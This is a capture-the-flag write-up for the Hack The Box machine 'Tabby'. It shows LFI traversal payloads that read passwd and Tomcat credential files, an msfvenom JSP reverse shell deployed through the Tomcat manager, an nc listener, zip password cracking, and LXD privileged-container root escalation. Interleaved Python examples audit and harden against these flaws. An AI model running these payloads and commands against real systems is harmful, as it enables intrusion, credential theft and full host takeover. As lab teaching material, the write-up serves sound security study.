Tabby HTB

Let pwn another box guys. Shall we?

Eswar Abisheak
8 min read, Sep 12, 2020

If you can’t give me poetry, can’t you give me poetical science?
-Ada Lovelace

OS: Linux
Difficulty: Easy
Points: 20
Release: 20 Jun 2020
IP: 10.10.10.194

Reconnaissance:-

Information gathering, that is, getting to know the target system, is the first step in ethical hacking. Reconnaissance is a set of processes and techniques (footprinting, scanning and enumeration) used to covertly discover and collect information about a target system.

During reconnaissance, an ethical hacker attempts to gather as much information about a target system as possible, following the seven steps listed below:

  • Gather initial information
  • Determine the network range
  • Identify active machines
  • Discover open ports and access points
  • Fingerprint the operating system
  • Uncover services on ports
  • Map the network

Enumeration

Enumeration can be used to gain information on:

  • Network shares
  • SNMP data, if they are not secured properly
  • IP tables
  • Usernames of different systems
  • Password policy lists

Enumeration depends on the services that the system offers. It can be:

  • DNS enumeration
  • NTP enumeration
  • SNMP enumeration
  • Linux/Windows enumeration
  • SMB enumeration

I am using the Nmap tool for enumeration. Note that the command below carries a stray "vuln" argument; nmap tries to resolve it as a hostname and reports "Failed to resolve" in the output, but the scan of 10.10.10.194 still runs.

nmap -sC -sV -oA SecNotes -vv vuln 10.10.10.194

kali@kali:/$ sudo nmap -sC -sV -oA SecNotes -vv vuln 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 06:48 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Failed to resolve "vuln".
Initiating Ping Scan at 06:48
Scanning 10.10.10.194 [4 ports]
Completed Ping Scan at 06:48, 0.30s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:48
Scanning megahosting.htb (10.10.10.194) [1000 ports]
Discovered open port 80/tcp on 10.10.10.194
Discovered open port 8080/tcp on 10.10.10.194
Discovered open port 22/tcp on 10.10.10.194
Completed SYN Stealth Scan at 06:48, 3.55s elapsed (1000 total ports)
Initiating Service scan at 06:48
Scanning 3 services on megahosting.htb (10.10.10.194)
Completed Service scan at 06:48, 6.50s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.194.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 6.68s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.91s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Nmap scan report for megahosting.htb (10.10.10.194)
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2020-06-21 06:48:30 EDT for 18s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http syn-ack ttl 63 Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.16 seconds
Raw packets sent: 1145 (50.356KB) | Rcvd: 1014 (40.560KB)

As port 22 is open, let's have a try:

kali@kali:/$ ssh sales@10.10.10.194
The authenticity of host '10.10.10.194 (10.10.10.194)' can't be established.
ECDSA key fingerprint is SHA256:fMuIFpNbN9YiPCAj+b/iV5XPt9gNRdvR5x/Iro2HrKo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.194' (ECDSA) to the list of known hosts.
sales@10.10.10.194: Permission denied (publickey).

Hmm, permission denied!

From the nmap results we can see that there are 3 ports open: 22, 80, 8080. We can also see that on port 8080 there is a Tomcat server running.

The website on port 80:

The website on port 8080:

After clicking on all the links on the port 80 website I found something interesting.

From here you need to do a few steps. First, add megahosting.htb to /etc/hosts.

After that is done, we can see that there is a possible LFI. I usually try to see if I can read the passwd file. In this case, yes.

OK, let's search for RCE now. We need a way in (a reverse shell). The website on port 8080 runs Tomcat, so I started googling how to exploit that with LFI. On that page we can also see some admin portals. If you are interested, please check the link: https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory

Otherwise you can copy and paste the URL below into your address bar.

http://megahosting.htb/news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

How about that? Look at what we have found: a username and password.

http://tabby/news.php?file=../../../../../../../../etc/passwd
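As an added example (not code from the write-up or from the box), here is the file-parameter handling that makes the traversal above work, next to a hardened resolver that refuses anything outside the intended directory. The web root and "files" directory names are assumptions:

```python
import os
import urllib.parse
from typing import Optional

# Assumed layout (not stated on the page): news articles live in a "files"
# directory under the Apache web root and are referenced by plain file name.
WEB_ROOT = "/var/www/html"
NEWS_DIR = os.path.join(WEB_ROOT, "files")

# The traversal string the write-up sends to news.php?file=
LFI_PAYLOAD = "../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml"


def vulnerable_news_path(file_param: str) -> str:
    """Equivalent of include("files/" . $_GET["file"]) with no validation.

    Each "../" walks one directory up; the surplus ones collapse at "/",
    which is why over-long traversal strings still land on the target file.
    """
    return os.path.normpath(os.path.join(NEWS_DIR, file_param))


def safe_news_path(file_param: str, news_dir: str = NEWS_DIR) -> Optional[str]:
    """Resolve the parameter and refuse anything that escapes news_dir.

    Decodes once (so %2e%2e variants are caught), rejects NUL bytes and
    absolute paths, then compares the fully resolved candidate against the
    resolved base directory. Returns None for anything outside it.
    """
    decoded = urllib.parse.unquote(file_param)
    if "\x00" in decoded or os.path.isabs(decoded):
        return None
    root = os.path.realpath(news_dir)
    candidate = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    print("vulnerable:", vulnerable_news_path(LFI_PAYLOAD))
    print("hardened:  ", safe_news_path(LFI_PAYLOAD))
    print("legit:     ", safe_news_path("latest.html"))
```

The comparison uses commonpath rather than a string prefix, so a sibling directory such as "files2" cannot slip past the check.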

Now it is time to figure out how to exploit that, since we have a username and password. I guess there are several ways to do it, but my original thought was a msfvenom payload.

Capture with Burp:

So the site is already vulnerable to LFI and we also know it is running a Tomcat service. Next, try to find the Tomcat admin credentials. Some good resources to read:

https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory

https://mkyong.com/tomcat/tomcat-default-administrator-password/#:~:text=1.,access%20the%20Tomcat%20manager%20page.

GET /news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1
Host: megahosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Finally, the credentials were tomcat:$3cureP4s5w0rd123!. Not much to think about; next, research how to exploit Tomcat.

Multiple Ways to Exploit Tomcat Manager

kali@kali:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.61 LPORT=9999 -f WAR >body.war
Payload size: 1090 bytes
Final size of war file: 1090 bytes

Now, after generating the payload, we have to upload it:

kali@kali:~$ sudo curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file body.war "http://tabby:8080/manager/text/deploy?path=/body.war"
OK - Deployed application at context path [/body.war]
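Added example (not part of the write-up): a small audit of a tomcat-users.xml, the file whose leak handed over the Manager credentials used above. The XML is a constructed sample, not the box's file; the username mirrors the write-up and the password values are placeholders.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of Tomcat 9's conf/tomcat-users.xml.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="PLACEHOLDER_PLAINTEXT"
        roles="admin-gui,manager-script"/>
  <user username="monitor" password="5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"
        roles="manager-status"/>
</tomcat-users>
"""

# Roles that let a holder deploy or reconfigure applications through the
# Manager/Host Manager apps; manager-script is what /manager/text/deploy needs.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                "admin-gui", "admin-script"}

# Digested credentials (digest.sh / MessageDigestCredentialHandler) are hex,
# optionally as salt$iterations$hash; anything else is a plaintext password.
DIGEST_RE = re.compile(r"^[0-9a-fA-F]+(\$\d+\$[0-9a-fA-F]+)?$")


def _users(xml_text):
    root = ET.fromstring(xml_text)
    # Strip the namespace so both namespaced and bare <user> tags match.
    return [e for e in root.iter() if e.tag.rsplit("}", 1)[-1] == "user"]


def users_with_deploy_roles(xml_text):
    """Map username -> sorted list of roles that permit WAR deployment."""
    result = {}
    for user in _users(xml_text):
        roles = {r.strip() for r in user.get("roles", "").split(",")}
        risky = sorted(roles & DEPLOY_ROLES)
        if risky:
            result[user.get("username", "")] = risky
    return result


def plaintext_password_users(xml_text):
    """Usernames whose stored password is not a digest."""
    return [u.get("username", "") for u in _users(xml_text)
            if u.get("password") and not DIGEST_RE.match(u.get("password"))]
```

Even with digested passwords, the real fix on this box is that tomcat-users.xml must not be readable by the account that serves news.php.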

Listening to get a reverse shell

kali@kali:~$ nc -lnvp 9999
listening on [any] 9999 ...
connect to [10.10.14.61] from (UNKNOWN) [10.10.10.194] 37630
python3 -c 'import pty; pty.spawn("/usr/bin/bash")'
tomcat@tabby:/var/lib/tomcat9$ ls
ls
conf lib logs policy webapps work
tomcat@tabby:/var/lib/tomcat9$ /var/lib/tomcat9$
/var/lib/tomcat9$
bash: /var/lib/tomcat9$: No such file or directory
tomcat@tabby:/var/lib/tomcat9$ ls
ls
conf lib logs policy webapps work
tomcat@tabby:/var/lib/tomcat9$ cd logs
cd logs/
tomcat@tabby:/var/lib/tomcat9/logs$ ls
ls
catalina.2020-05-19.log.gz localhost.2020-06-17.log.gz
catalina.2020-05-21.log.gz localhost.2020-06-20.log.gz
catalina.2020-05-22.log.gz localhost.2020-07-19.log
catalina.2020-06-16.log.gz localhost_access_log.2020-05-19.txt.gz
catalina.2020-06-17.log.gz localhost_access_log.2020-05-21.txt.gz
catalina.2020-06-20.log.gz localhost_access_log.2020-05-22.txt.gz
catalina.2020-07-19.log localhost_access_log.2020-06-16.txt.gz
localhost.2020-05-19.log.gz localhost_access_log.2020-06-17.txt.gz
localhost.2020-05-21.log.gz localhost_access_log.2020-06-20.txt.gz
localhost.2020-05-22.log.gz localhost_access_log.2020-07-19.txt
localhost.2020–06–16.log.gz
tomcat@tabby:/var/lib/tomcat9/logs$ cd ..
cd ..

After some browsing, the only interesting thing I found was a backup file in zip format. Download that to your local machine and use:

fcrackzip -D -p rockyou.txt 16162020_backup.zip

The result will be:

Now we can switch users

tomcat@tabby:/var/lib/tomcat9$ su - ash
su - ash
Password: admin@it
ash@tabby:~$ cd /home
cd /home
ash@tabby:/home$ ls
ls
ash
ash@tabby:/home$ cd ash
cd ash/
ash@tabby:~$ ls
ls
alpine-v3.12-x86_64-20200719_0201.tar.gz snap user.txt
ash@tabby:~$ cat user.txt
cat user.txt

Cool, we are done with the user part 😃

Getting Root

Downloading the Alpine image to the target box (served from my attacking machine on port 8000):

ash@tabby:~$ wget http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
<14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
--2020-06-21 17:20:54-- http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
Connecting to 10.10.14.12:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3212312 (3.1M) [application/gzip]
Saving to: 'alpine-v3.12-x86_64-20200621_2204.tar.gz'

alpine-v3.12-x86_64 100%[===================>] 3.06M 67.4KB/s in 45s

2020-06-21 17:21:39 (70.2 KB/s) - 'alpine-v3.12-x86_64-20200621_2204.tar.gz' saved [3212312/3212312]

Importing the image into LXD on the target:

ash@tabby:~$ lxc image import ./alpine-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
<ne-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04

ash@tabby:~$ lxc image list
lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| liquid | 1145f55bb6a7 | no | alpine v3.12 (20200621_22:04) | x86_64 | CONTAINER | 3.06MB | Jun 21, 2020 at 5:21pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+

Configuring LXD with lxd init:

ash@tabby:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: no
Do you want to configure a new storage pool? (yes/no) [default=yes]: yes
Name of the new storage pool [default=default]:
Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: dir
Would you like to connect to a MAAS server? (yes/no) [default=no]: no
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]: liquid
What IPv4 address should be used? (CIDR subnet notation, "auto" or "none") [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, "auto" or "none") [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:

Running the exploit

ash@tabby:~$ lxc init liquid privesc -c security.privileged=true
Creating privesc
ash@tabby:~$ lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to privesc
ash@tabby:~$ ^C
ash@tabby:~$ lxc start privesc
ash@tabby:~$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root
/mnt/root # ls
bin home lost+found root swap.img
boot lib media run sys
cdrom lib32 mnt sbin tmp
dev lib64 opt snap usr
etc libx32 proc srv var
/mnt/root # cd root
/mnt/root/root # wc -c root.txt
33 root.txt
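Added example (not from the write-up): a Python audit for the two conditions the escalation above relies on, membership of the lxd group and a privileged container with the host's / attached as a disk device. Both inputs are constructed samples; the config text follows the shape of `lxc config show <container> --expanded` output, which is an assumption about the format rather than something the page shows.

```python
# Constructed /etc/group excerpt (not copied from the box): ash is in lxd.
SAMPLE_GROUP = """root:x:0:
lxd:x:116:ash
ash:x:1000:
"""

# Constructed text in the shape of `lxc config show privesc --expanded` for the
# container built above (format assumed; compare with your LXD version).
SAMPLE_CONFIG = """config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    source: /
    type: disk
"""

ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel", "disk"}  # root on host


def root_equivalent_memberships(group_text):
    """Map username -> root-equivalent groups listed in /etc/group text."""
    found = {}
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] in ROOT_EQUIVALENT_GROUPS:
            for member in filter(None, parts[3].split(",")):
                found.setdefault(member, []).append(parts[0])
    return found


def container_risks(config_text):
    """List the settings that turn a container into a host-root shell."""
    risks, devices, current, in_devices = [], {}, None, False
    for line in config_text.splitlines():
        if not line.startswith(" "):                 # top-level key
            in_devices = line.strip() == "devices:"
            continue
        key, _, value = line.strip().partition(":")
        value = value.strip().strip('"')
        if key == "security.privileged" and value == "true":
            risks.append("security.privileged=true: uid 0 inside is uid 0 on the host")
        if in_devices and len(line) - len(line.lstrip()) == 2:   # device name
            current, devices[key] = key, {}
        elif in_devices and current:
            devices[current][key] = value
    for name, dev in devices.items():
        # A disk device backed by a host path, not a storage pool, hands that part of the host to the container.
        if dev.get("type") == "disk" and "pool" not in dev and dev.get("source", "").startswith("/"):
            risks.append(f"disk device {name} exposes host {dev['source']} at {dev.get('path')}")
    return risks
```

Removing ash from the lxd group (or restricting LXD to a dedicated service account) closes the path; the container settings themselves are only reachable because group membership grants full control of the LXD socket.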

Root was very simple 🚀 Getting a foothold was the only important part of this box. I hope you learned a lot from it. Feel free to ask or suggest in the comments section. I hope you liked the write-up; if so, clap, buddy 😄.

Thanks to egre55 for making this box. 👏


Written by Eswar Abisheak

DSCVIIT lead || https://eswar.dev || HTB player || Competitive Coding